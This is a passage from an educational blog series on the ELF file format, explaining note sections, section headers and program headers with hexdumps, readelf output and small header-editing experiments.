<li><span style="font-family: "courier new" , "courier" , monospace;">0x10 (4 bytes) desc</span> - the description field holding some numbers that indicate </li>
</ul>
Documentation describes that you can potentially have a note section that has no descriptor, in that case we just set the <span style="font-family: "courier new" , "courier" , monospace;">descsz</span> to 0, and don't have the section at <span style="font-family: "courier new" , "courier" , monospace;">0x0B</span>.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Here's what a note section looks like in a hexdump:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTK9BlvbtzN9MSK15Sqnoe0YW4qNA1PzwSVV0099yR2EOeepxkQ0fsdLuoP38G-qhFG4yWTkFi_TQaS8ZfxXlkb-KK1dBYMApREXRCgB0c0lk3IyftP16QqU3OgbMpKHVcYrfZ3TFVl2E/s1600/note+section.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="1139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTK9BlvbtzN9MSK15Sqnoe0YW4qNA1PzwSVV0099yR2EOeepxkQ0fsdLuoP38G-qhFG4yWTkFi_TQaS8ZfxXlkb-KK1dBYMApREXRCgB0c0lk3IyftP16QqU3OgbMpKHVcYrfZ3TFVl2E/s1600/note+section.png" /></a></div>
<br />
<br />
Here we can see the following settings for the field values:<br />
<br />
<ul style="text-align: left;">
<li>namesz is set to<span style="font-family: "courier new" , "courier" , monospace;"> 0x04 00 00 00</span> which means the name field is 4 bytes in size</li>
<li>descsz is set to<span style="font-family: "courier new" , "courier" , monospace;"> 0x10 00 00 00</span> which means the description field is 16 bytes in size</li>
<li>type is set to <span style="font-family: "courier new" , "courier" , monospace;">0x01 00 00 00</span> which means this is GNU/Linux (<i>because my machines are FREE machines!</i>)</li>
<li>name field reads <span style="font-family: "courier new" , "courier" , monospace;">0x47 0x4e 0x55 0x00</span> which we can clearly see reads<span style="font-family: "courier new" , "courier" , monospace;"> 'G' 'N' 'U'</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">desc</span> field holds an array of values starting at <span style="font-family: "courier new" , "courier" , monospace;">0x268 -> 0x27C</span>. </li>
</ul>
<div>
The <span style="font-family: "courier new" , "courier" , monospace;">desc</span> field needs a little explaining and the documentation on it is slim but here's a couple places that may expand on it better than I do (<i>I've included them in the reading and references section</i>) To see how its handled check out this extract from <span style="font-family: "courier new" , "courier" , monospace;">glibc-2.28/elf/dl-load.c</span>:</div>
<div>
<script src="https://gist.github.com/k3170makan/6fc9bec56bec621cf27b5ff979e4dddf.js"></script>
</div>
<div>
<br /></div>
<br />
<br />
Essentially it indicates the OS version and this is clearly compared to a standardized value in the library when <span style="font-family: "courier new" , "courier" , monospace;">dl-load</span> handles it. How exactly this OS version field works is going to take a little more research on my part before I get much more mouthy about it.<br />
<br />
<h2 style="text-align: left;">
Conclusion</h2>
<br />
That's going to be it for this post I don't like to bloat posts with too much text because as we know things are easier to understand when they are broken into smaller parts and carefully studied*(<i>see the side rant for more hehe</i>). In further posts in the series I will expand on the rest of the sections. For now I hope that cracking open these few I've started you on your way in detailing how the others work too; by understanding their types, and therefore layout gives us power to control how they are interpreted. There is a lot more tricks that can be pulled off by messing with these fields. So happy hacking!<br />
<br />
And stay tuned for the follow up posts on the GNU_HASH and other weird archaic section types.<br />
<br />
<h2 style="text-align: left;">
References and Recommended Reading:</h2>
<br />
<br />
<ol style="text-align: left;">
<li><a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format%C2%A0">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format </a></li>
<li><a href="https://refspecs.linuxfoundation.org/LSB_2.1.0/LSB-Embedded/LSB-Embedded/elftypes.html%C2%A0">https://refspecs.linuxfoundation.org/LSB_2.1.0/LSB-Embedded/LSB-Embedded/elftypes.html </a></li>
<li><a href="https://blogs.oracle.com/solaris/inside-elf-symbol-tables-v2">https://blogs.oracle.com/solaris/inside-elf-symbol-tables-v2 </a></li>
<li><a href="https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-79797/index.html%C2%A0">https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-79797/index.html </a></li>
<li><a href="https://sourceware.org/ml/binutils/2006-10/msg00377.html%C2%A0">https://sourceware.org/ml/binutils/2006-10/msg00377.html</a></li>
<li><a href="https://r00tk1ts.github.io/2017/08/24/GNU%20Hash%20ELF%20Sections/">https://r00tk1ts.github.io/2017/08/24/GNU%20Hash%20ELF%20Sections/</a> </li>
<li><a href="https://en.wikipedia.org/wiki/Weird_machine">https://en.wikipedia.org/wiki/Weird_machine </a></li>
<li><a href="https://www.cs.dartmouth.edu/~sergey/wm/">https://www.cs.dartmouth.edu/~sergey/wm/ </a></li>
<li><a href="https://en.wikipedia.org/wiki/Category_theory">https://en.wikipedia.org/wiki/Category_theory </a></li>
<li><a href="http://langsec.org/papers/Bratus.pdf">http://langsec.org/papers/Bratus.pdf </a></li>
</ol>
<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>*<side-rant></b></span><br />
Why is this? Why do we need to break things to learn them? Especially in computers? As we know in many sciences we learn how things are build by breaking them down, tearing them apart and boiling away their non-essential parts and deciding what they mean from the perspective of their super-structures - we study how the "super" works by breaking open its "minor" parts i.e. <i>we learn how large complex curves work and behave in calculus work by breaking them down into small straight lines; or learn what particles are constituted of, by smashing them into one another so we can see the smaller parts; or learn how philosophy texts work by deconstructing them in some contexts and reconstructing them in other contexts- it seems to be a common theme in fields held to traditions of rigorous logical thinking</i>.<br />
<br />
More directly perhaps in the science of computer hacking, because we often work in the realms governed by <i>(or are inevitably always governed by</i>) the capability of computer languages (<i>which themselves are governed by the relations between sets, their labels and sizes</i>); some have realized that our greatest pains and harshest challenges come often straight from underestimating the way languages work when they are allowed to be spoken with their broken, inconsistent and superstructure referencing parts (<i>every language is an expression of a "base" or "host" language that usually has different and more powerful capabilities than its "guest" - in computer science we discern the power of these languages by their computational capabilities</i>).<br />
<br />
Just to cleanly connect my points here - one language is the "bigger", around or hosting another language by the size of its <i>computational</i> power and because of the references possible from its "hosting" or subset and computationally smaller languages i.e what it can possibly compute under certain proofs when using those small languages in these contexts. Sometimes they lend "subsets" of this power to isolated subsets of their literal symbols:<i> for instance have a "language" "within" JavaScript for setting variable values and another "within" JavaScript for part controlling execution flow, could for instance a variable setting be allowed to become an if statement or equivalently a control of execution flow? Of course! Its JavaScript! Just stick the variable value in an eval call ;) </i><br />
<br />
So through these languages we can directly speak (<i>strings and other input data</i>) we make reference to outer more powerful structures that appear within languages themselves (<i>or more generally are "equivalently" in the languages themselves - I leave space for <a href="https://en.wikipedia.org/wiki/Category_theory">category theory </a>and input fuzzing to argue what is the "Set" and therefore what is "in" it as well</i>), that also impose or allow power over their ordering and labeling and effective interpretation. We say that these spirits called "<a href="https://en.wikipedia.org/wiki/Weird_machine">weird machines</a>" arise from learning what we can summon in apparent or seeming "non-weird machines" by giving execution and interpretation to the aspects of a language that are built in the "intersections" between other languages. Quick example relevant here is to say; if you can make string input to a program also impose meaning (<i>ordering or labeling properties</i>) on the stack layout (regardless of <i>how</i>); namely the string is both character data and stack address data, it exposes an intersection of two languages which gives life to the string data in an unusual but powerful way - it is not just displayable but also executable!<br />
<br />
Anyway sorry for the philosophical rant - on with the section meta-data mangling! <b><span style="font-family: "courier new" , "courier" , monospace;"></side-rant></span></b><br />
<br />
<br />
<br /></div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-41600725793192952312018-09-25T23:42:00.001-07:002018-09-26T17:39:37.564-07:00Introduction to the ELF File Format (Part III) : The Section Headers<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Hi folks! This post is part of a series I'm covering on the ELF format. In this one I'm going to discuss the section headers and unpack how they work.<br />
<br />
So far we have:<br />
<ol style="text-align: left;">
<li><a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">Introduction to the ELF File Format : The ELF Header (Part I)</a> </li>
<li><a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">Introduction to the ELF File Format Part II : Program Headers </a> (<i>I know the naming is confusing, totally didn't play this out that well but I'll keep it consistent from here on out ;</i>)</li>
<li>This</li>
</ol>
<div>
I know its a super long list right? But is going to get a bunch more entries very soon. In this one I'm going to cover the rest of the fields I skipped in the first section, unpack how section headers work and I thought I'd drop a nice illustration of the format as well. Enjoy!</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0t2DD6JmiZbsl2z0MEqs10pMpMaIFbbJmZdoLMKGNB8YQbRazqoctRJhLoOWWxXN7EIAOW3Wh-sPYUOd8tUDZFzQyGOPnpkRglgIeSMXojBB4XNGGHfrmC_HrHoe2Z_DX4s9Zne7yXrI/s1600/ELF+Format+Sketch+%25284%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="912" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0t2DD6JmiZbsl2z0MEqs10pMpMaIFbbJmZdoLMKGNB8YQbRazqoctRJhLoOWWxXN7EIAOW3Wh-sPYUOd8tUDZFzQyGOPnpkRglgIeSMXojBB4XNGGHfrmC_HrHoe2Z_DX4s9Zne7yXrI/s1600/ELF+Format+Sketch+%25284%2529.png" /></a></div>
</div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">e_flags </span>field and the rest</h2>
<div>
This header field can contain a number of architecture specific values and sometimes indicate things about the ABI as well. Each architecture defines its own weird set of values for these and they basically mark the ELF with certain attributes, mostly involving whether it makes use of extensions or special code formats. Here's the example for MIPS:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEEBdb7MF3cGfxLDqDNU4RrTsbXJR8Ox6bMdwNlojwrJEfGO-3WYtdWeSsid1XbYOos8IrIVCEyyFVgUolHZNuXYIB0yaw_QaKPnt2UtwKobFZzplRSsXCRSBfuY6PnBPjl6KwF-osH1A/s1600/Screenshot+from+2018-09-24+19-57-46.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="472" data-original-width="1427" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEEBdb7MF3cGfxLDqDNU4RrTsbXJR8Ox6bMdwNlojwrJEfGO-3WYtdWeSsid1XbYOos8IrIVCEyyFVgUolHZNuXYIB0yaw_QaKPnt2UtwKobFZzplRSsXCRSBfuY6PnBPjl6KwF-osH1A/s1600/Screenshot+from+2018-09-24+19-57-46.png" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;">from <a href="https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions">https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions </a></td></tr>
</tbody></table>
<br />
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
As you can see pretty boring stuff, there's also special fields for <a href="http://infocenter.arm.com/help/topic/com.arm.doc.ihi0044f/IHI0044F_aaelf.pdf">ARM</a> and <a href="https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-43405/index.html">SPARC</a> and should be for all the other architectures ELFs can run on (they just aren't as easy to find as an example as those two lol).<br />
<br /></div>
<h2 style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">e_shstrndx</span></h2>
<div>
This field holds the index of the<span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span>, in the section header table. This section is merely an array of names for sections (used by readelf as well) providing some semantics for interpretation. This array is delimited by null values.<br />
<br />
To make sure we know how it works for sure here's a quick diagram showing how this section works:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwobZ_AY3TxnIGe-gWpqF6sSVKsbSA6fawcrCx9LSNf0An6WICI81qTo24Z3OXMKat5JlkHYNE_F95TDxqVtKzc0enmKn9UsOrfk1_eglPX-dONTRAUmNIWYl8YgNTrl2SM5ZcIqDVaR0/s1600/shstrndx+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwobZ_AY3TxnIGe-gWpqF6sSVKsbSA6fawcrCx9LSNf0An6WICI81qTo24Z3OXMKat5JlkHYNE_F95TDxqVtKzc0enmKn9UsOrfk1_eglPX-dONTRAUmNIWYl8YgNTrl2SM5ZcIqDVaR0/s1600/shstrndx+%25281%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div>
<br /></div>
<div>
As you can see, in the header value dump from <span style="font-family: "courier new" , "courier" , monospace;">readelf</span>, the index number is listed as 28. The next image shows a dump of the section header table also from <span style="font-family: "courier new" , "courier" , monospace;">readelf -S</span>. We're focused in on entry 28 which is called the <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span>. The last frame shows an honest <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span> of the file confirming these theories, offset <span style="font-family: "courier new" , "courier" , monospace;">0x18f4</span> contains the start of the ascii data that programs like <span style="font-family: "courier new" , "courier" , monospace;">ld</span> and <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> deference as the names of the sections.<br />
<br />
Okay that's the ELF header finally done and dusted. Lets check out how section headers work. </div>
<h2 style="text-align: left;">
Section Headers</h2>
<div style="text-align: left;">
Finally time to explain the section headers. They serve almost purely to tag areas of the file with semantic information so other files can find symbols, debug information, meta-data about sections themselves and much much more. Here are the ELF header fields that hold information about the section header table:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">e_shoff</span> - file offset where the section headers start</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">e_shnum</span> - number of entries in the </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">e_shentsize</span> - the size of entries in the section header table</li>
</ul>
<div>
These are pretty straight forward as you can see they just allow the ELF interpreters to aim at the start of the table and logically limit the size of entries. Each section header table entry itself has a couple of properties to it. Sections have types, related sections that hold meta-data, and names! Here's what the ELF standard defines as section attributes:</div>
<div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_name</span> - the index of <span style="font-family: "courier new" , "courier" , monospace;">.strtab</span> that contains the section name</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_type</span> - the section type (<span style="font-family: "courier new" , "courier" , monospace;">SHT_NULL, SHT_DYN</span>,...)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_flags</span> - the memory attributes of this section during execution (<span style="font-family: "courier new" , "courier" , monospace;">SHF_WRITE, SHF_ALLOC</span>,...)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_addr</span> - the address in the file where this section starts</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_size</span> - the size in bytes this section occupies</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> - associates a section to this one, field value can depend on <span style="font-family: "courier new" , "courier" , monospace;">sh_type</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_addralign</span> - memory alignment value for this section</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_entsize</span> - the size of the entry in bytes.</li>
</ul>
</div>
<div>
These fields have a number of sub-fields so I've sketched some of them out to give you a kind of cheat sheet over view:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX0328Z2jKOM4qg5ZY5V9hCQBzUsvBT-BkxI9NGXFehAff9JoyrSNmABVbXZXFZ1rtzAxTUm4SwW5ch9kKv0GXxz0SKpXfRW8HDLBfxDVRco0GvtJXG2uZ9cI8TOcMcTnIs6Uy9nAyHpU/s1600/Section+Headers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="912" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX0328Z2jKOM4qg5ZY5V9hCQBzUsvBT-BkxI9NGXFehAff9JoyrSNmABVbXZXFZ1rtzAxTUm4SwW5ch9kKv0GXxz0SKpXfRW8HDLBfxDVRco0GvtJXG2uZ9cI8TOcMcTnIs6Uy9nAyHpU/s1600/Section+Headers.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> field associates this section to another in order to provide important meta-data for its function. So for instance if a section requires a list of other strings to make sense of this field will contain the index of the section that contains that data. </div>
<div>
<br /></div>
<div>
A good analogy would be if the section is about lets say a list of pokemon cards you might need a section to define pokemon card types or hold the name values for the cards in this case <span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> would point to the section that contains this data. So it allows sections to support one another in function.<br />
<br />
We can see examples of this in the functionality of sections like the <span style="font-family: "courier new" , "courier" , monospace;">.rela.plt</span> or <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span> (<i>list of dynamic symbols and their properties</i>) which probably needs to know where the dynamic symbol names are so therefore would contain some <span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> value that would prove helpful in this sense.<br />
<br />
Here's how it looks when <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> interprets this - with some helpful annotation of course:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5vVVGvf6Drv2_9Fg7RTQiEtRn17QurZy1h59dimvNw6wc-i2x05KBYL9l0TNojHwGaErYCYHYN5wkMLGAUGEOuvRGoZWFwwTpShRwV0FFK5HS7U8w5saxU10asPx84bMZPhRJVRb5-EU/s1600/sh_link+%25284%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="817" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5vVVGvf6Drv2_9Fg7RTQiEtRn17QurZy1h59dimvNw6wc-i2x05KBYL9l0TNojHwGaErYCYHYN5wkMLGAUGEOuvRGoZWFwwTpShRwV0FFK5HS7U8w5saxU10asPx84bMZPhRJVRb5-EU/s1600/sh_link+%25284%2529.png" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
I hope that makes it clear what that field is for. It just provides a pointer to another section header with some important associated information. Its pretty much the same story for the <span style="font-family: "courier new" , "courier" , monospace;">sh_info</span> field, here's what the section header table looks like when its labelled to reflect the sh_info field references:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVcO38CYXkwa3eGZqn7zp8XwdzGQ0GztA3aSO64qV-mMSHhzulxgwod5qa6y2RKK8dzrLINzwS_se20q5BeQRAM7q3rQHdqXyVMn880B5hJXkfI3CMguUou4855CN8oQzD4x1KHf5We34/s1600/sh_info.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="817" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVcO38CYXkwa3eGZqn7zp8XwdzGQ0GztA3aSO64qV-mMSHhzulxgwod5qa6y2RKK8dzrLINzwS_se20q5BeQRAM7q3rQHdqXyVMn880B5hJXkfI3CMguUou4855CN8oQzD4x1KHf5We34/s1600/sh_info.png" /></a></div>
<br /></div>
<div>
Its no surprise the <span style="font-family: "arial" , "helvetica" , sans-serif;">.dynsym</span> points to the <span style="font-family: "courier new" , "courier" , monospace;">.interp</span> section. <span style="font-family: "courier new" , "courier" , monospace;">.interp</span> holds the path name of the interpreter. The interpreter is after all the program in charge of making sense of the symbol table and function relocation.</div>
<div>
<br />
You might be interested in in knowing how this looks in <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span>, so here you go (<i>with nice labels too!</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpxR7YP3U3qgZFYikseTqdWbfy5F2c1-Yellv3JpUI0qk2fgbDFGnxrYIL9q5paz4DAtcv7ndZTxDkuZewGVcyx-5B2CZ_Yex_ZgLSjt9yywtPNWM-6l83Pb9wASZftekmhGK2iAG6Yk/s1600/Section+Header+Table.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="388" data-original-width="1016" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpxR7YP3U3qgZFYikseTqdWbfy5F2c1-Yellv3JpUI0qk2fgbDFGnxrYIL9q5paz4DAtcv7ndZTxDkuZewGVcyx-5B2CZ_Yex_ZgLSjt9yywtPNWM-6l83Pb9wASZftekmhGK2iAG6Yk/s1600/Section+Header+Table.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
As you can see the <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> really is used to deference the names of the sections. In the raw format, the <span style="font-family: "courier new" , "courier" , monospace;">0x1b</span> is the index in <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> where the name of <span style="font-family: "courier new" , "courier" , monospace;">.interp</span> is saved. We can now see that <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> actually fetches this for us and prints out the nice fancy name.<br />
<br /></div>
<div>
We can move on to unpacking how the symbol and library resolution works. Stay Tuned!</div>
<div>
<h2 style="text-align: left;">
References and Reading</h2>
</div>
<div>
<ol style="text-align: left;">
<li><a href="https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-43405/index.html%C2%A0">https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-43405/index.html </a></li>
<li><a href="http://openpowerfoundation.org/wp-content/uploads/resources/leabi/content/dbdoclet.50655241_97607.html%C2%A0">http://openpowerfoundation.org/wp-content/uploads/resources/leabi/content/dbdoclet.50655241_97607.html </a></li>
<li><a href="https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions">https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions</a></li>
<li><a href="https://greek0.net/elf.html">https://greek0.net/elf.html </a></li>
</ol>
</div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-74759936625889367702018-09-14T00:20:00.001-07:002018-09-14T01:00:49.693-07:00Introduction to the ELF Format Part II : Understanding Program Headers <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Welcome back folks! In the <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">previous post</a> I covered pretty much the most trivial parts of the ELF file format. In this post we are actually going to work with one of the most interesting mechanisms in the file - the program headers! I skipped some parts of the ELF header in the previous post and decided to cover them here specifically because they inform on the Program Headers anyway. Lets get started!<br />
<h2 style="text-align: left;">
Introduction : What are Program Headers?</h2>
<br />
I mentioned in <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">part 1</a> that the ELF format performs two tasks. A recipe for how to sublimate dead files into living processes and adds the bells and whistles needed to make the file look pretty to gdb, the dynamic loader and a bunch of other tools. Program Headers (<i>among other functions</i>) are more often for telling the memory loader where to put stuff. It also has some house keeping functions.<br />
<br />
We'll get into how these memory loading powers and formats work a little later for now its just important to keep in mind a good idea of what to expect in terms of the purpose of these fields.<br />
<br />
<h2 style="text-align: left;">
ELF Header continued</h2>
The ELF header covered in the previous post holds some fields specific to the program headers these are the:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> - indicates the offset in the file where the start of the program headers (<i>technically speaking this "needs" to always point to a PHDR section but that's not entirely true - stay tuned!</i>) </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">e_phentsize</span> - indicates the byte size of program header entries</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">e_phnum</span> - indicates the number of program header entries</li>
</ul>
<div>
One can imagine that the way these functions are used is probably to help logically limit traversal of the headers.<br />
Lets take a look at what program headers look like in some raw hex:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWiCzMg6xX9YzTX4JlU2EmSjt807TV3dFiwkfRrPB7a0cKnCnA9VAdFNm2fGuXvE5oMVG34zob4eDlFCweI_h-VB02ss-6RFal9IIAaT2W83EjMhavWdB_0ZZkiPrUPr0AcJmoVq44aII/s1600/ELF+Program+Headers+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="914" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWiCzMg6xX9YzTX4JlU2EmSjt807TV3dFiwkfRrPB7a0cKnCnA9VAdFNm2fGuXvE5oMVG34zob4eDlFCweI_h-VB02ss-6RFal9IIAaT2W83EjMhavWdB_0ZZkiPrUPr0AcJmoVq44aII/s1600/ELF+Program+Headers+%25282%2529.png" /></a></div>
<br />
<br />
<i>I had to block out part of my terminal when I made this because i sometimes run a .bashrc that displays some network stuff in my terminal prompt. </i></div>
<div>
<br />
<div>
If you want to check out the program headers for an elf file these are the magic commands you need:<br />
<blockquote class="tr_bq">
<br />
readelf -l ./compile.elf </blockquote>
<br /></div>
<div>
<div style="margin: 0px;">
As a fun experiment we can play with the <span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> field to make the program skip some of the program headers. Right now the program headers are shown to start at <span style="font-family: "courier new" , "courier" , monospace;">0x40</span> which is 64 bytes into the file -<i> usually they will start there right after the ELF header</i>, but there's no strict reason they need to! Lets see what happens if we shift the <span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> address down one program header.<br />
<br />
So the first program header appears at <span style="font-family: "courier new" , "courier" , monospace;">0x40</span>, the next one (The <span style="font-family: "courier new" , "courier" , monospace;">INTERP</span> section) at <span style="font-family: "courier new" , "courier" , monospace;">0x78</span>, which is exactly <span style="font-family: "courier new" , "courier" , monospace;">0x38 = 56</span> bytes down from the start of the program headers; as indicated by the <span style="font-family: "courier new" , "courier" , monospace;">e_phentsize</span> field in the ELF header.</div>
<div style="margin: 0px;">
<br />
Editing the raw binary so that <span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> points to <span style="font-family: "courier new" , "courier" , monospace;">0x78</span> results in this readelf output:</div>
<div style="margin: 0px;">
<br /></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6z5JHeRVABy7FAB8sL0FvyKPa1EHIk86-l2xzOPbaY7EiTjaNUu9EHHwFl2V2VHIGb2mG_0KCTPk3FyPygm4F-0BDBngPzp36FjjsT1gUVJnWWuPai9h-w5_4YzmFWOOYUoKgDNToPX0/s1600/E_PHOFF+displacement.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="882" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6z5JHeRVABy7FAB8sL0FvyKPa1EHIk86-l2xzOPbaY7EiTjaNUu9EHHwFl2V2VHIGb2mG_0KCTPk3FyPygm4F-0BDBngPzp36FjjsT1gUVJnWWuPai9h-w5_4YzmFWOOYUoKgDNToPX0/s1600/E_PHOFF+displacement.png" style="cursor: move;" /></a></div>
</div>
<br />
<br /></div>
<div>
You might wonder if this ELF without its PHDR program header still runs? YES! No one cares about your PHDR program header!<br />
<br />
There are a number of types of program headers. Each of them with a different purpose:<br />
<ol style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x00000006 PHDR</span> - Indicates the beginning of the program header table itself. This section according to documentation requires a loadable segment entry, but here we see that it being proceeded with <span style="font-family: "courier new" , "courier" , monospace;">PT_INTERP</span> means this is not true! More than that its not even needed for the ELF to run (<i>according to the sample I'm using here! Of course you may be running on a system or architecture that actually takes this field seriously</i>).</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x00000003 PT_INTERP</span> - this section indicates the program path name that will be invoked as the interpreter of the ELF should it be an executable. It of course will be ignored if the ELF is not executable. You can try pointing this to other programs to see what happens :)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x00000001 PT_LOAD</span> - the most important program header type. Defines how a portion of the file that must be placed in memory. This leverages the other attributes of the program header and changes their meaning slightly because they appear in this context (<i>see below how <span style="font-family: "courier new" , "courier" , monospace;">p_vaddr</span>, <span style="font-family: "courier new" , "courier" , monospace;">p_paddr</span> etc are explained in in the context of <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span></i>)</li>
</ol>
<div>
The <span style="font-family: "courier new" , "courier" , monospace;">PT_INTERP</span> is a little strange in that it points to an offset in the file especially for holding a string is the file path of the program meant to interpret the file (<i>this is why ours points to ld-linux the "loader dynamic"</i> ).<br />
<br />
Here's what this actually looks like in the raw hex:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
